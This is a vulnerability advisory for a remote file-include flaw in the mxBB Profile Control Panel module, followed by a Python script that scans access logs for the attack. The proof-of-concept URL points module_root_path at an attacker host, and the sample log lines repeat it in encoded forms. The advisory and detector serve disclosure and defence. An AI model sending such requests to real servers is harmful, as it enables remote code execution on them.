MXBB Profile Control Panel Module Remote File Include Vulnerability
BID:21520
Info
| Bugtraq ID: | 21520 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 09 2006 12:00AM |
| Updated: | Dec 09 2006 12:00AM |
| Credit: | bd0rk and SOH-Crew are credited with the discovery of this vulnerability. |
| Vulnerable: | mxBB Profile Control Panel 0.91c |
| Not Vulnerable: | |
Discussion
The mxBB Profile Control Panel module is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer in the context of the webserver process.
mxBB Profile Control Panel Module version 0.91c is vulnerable to this issue.
Exploit / POC
An attacker can exploit this issue via a web client.
The following proof of concept is available:
http://example.com/[directory]/includes/profilcp_constants.php?module_root_path=http://attacker.com
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
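A log check for the request pattern shown in the proof of concept, as an added example that is not part of the original advisory: it flags access-log entries where module_root_path is passed to includes/profilcp_constants.php with a URL-like value, including percent-encoded forms. The log lines are constructed samples; the Common Log Format layout and all function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script and parameter taken from the advisory's proof of concept.
TARGET_SCRIPT = "/includes/profilcp_constants.php"
TARGET_PARAM = "module_root_path"
# A value starting with "scheme:" (http:, ftp:, php:, data:, ...) or a
# protocol-relative "//host" points the include outside the local tree.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries (Common Log Format assumed), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Dec/2006:12:00:01 +0000] "GET /forum/includes/profilcp_constants.php?module_root_path=http://attacker.example/ HTTP/1.1" 200 512',
    '192.0.2.11 - - [09/Dec/2006:12:00:02 +0000] "GET /forum/includes/profilcp_constants.php?module_root_path=https%3A%2F%2Fattacker.example%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [09/Dec/2006:12:00:03 +0000] "GET /forum/includes/profilcp_constants.php?module_root_path=%2568ttp%253A%252F%252Fattacker.example%252Fx HTTP/1.1" 200 512',
    '192.0.2.13 - - [09/Dec/2006:12:00:04 +0000] "GET /forum/includes/profilcp_constants.php?module_root_path=./ HTTP/1.1" 200 512',
    '192.0.2.14 - - [09/Dec/2006:12:00:05 +0000] "GET /forum/index.php?module_root_path=http://attacker.example/ HTTP/1.1" 200 512',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568 -> %68 -> h)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_rfi_attempt(log_line):
    """True if the entry requests the affected script with a remote-looking value."""
    m = REQUEST_LINE.search(log_line)
    if not m:
        return False
    url = urlsplit(m.group(1))
    if not fully_decode(url.path).lower().endswith(TARGET_SCRIPT):
        return False
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if fully_decode(name) == TARGET_PARAM and REMOTE_VALUE.match(fully_decode(value)):
            return True
    return False

def scan(lines):
    return [line for line in lines if is_rfi_attempt(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any direct request to this include file is unusual, so entries the check does not flag (such as the fourth sample) may still merit review.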
References
References:
- Vendor Home Page (mxBB)